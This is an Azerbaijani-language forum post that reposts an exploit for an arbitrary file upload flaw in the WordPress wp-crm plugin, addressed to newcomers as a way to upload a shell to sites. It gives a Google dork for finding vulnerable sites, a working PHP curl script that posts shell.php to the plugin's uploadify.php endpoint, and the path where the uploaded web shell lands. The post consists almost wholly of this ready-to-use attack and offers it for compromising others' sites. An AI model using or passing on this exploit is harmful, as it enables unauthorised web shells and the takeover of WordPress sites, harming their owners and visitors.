Dedimki bu dəfədə yenilər üçün bir şey paylaşım...
Bu açıqla sayta shell upload edə bilərsiz...
============================================================================================================================================================================================================================
Full title WordPress wp-crm Plugin Arbitrary File Upload Vulnerability
Date add 2014-06-28
Category web applications
Platform php
Risk 80 faiz
Affected ver All Version Affected
Tested on Linux
Goole Dork : inurl:/wp-content/plugins/wp-crm/
Exploit :
Kod:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://localhost/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell yolu ==== > [url]http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)[/url]
Originalı : http://1337day.com/exploit/22388
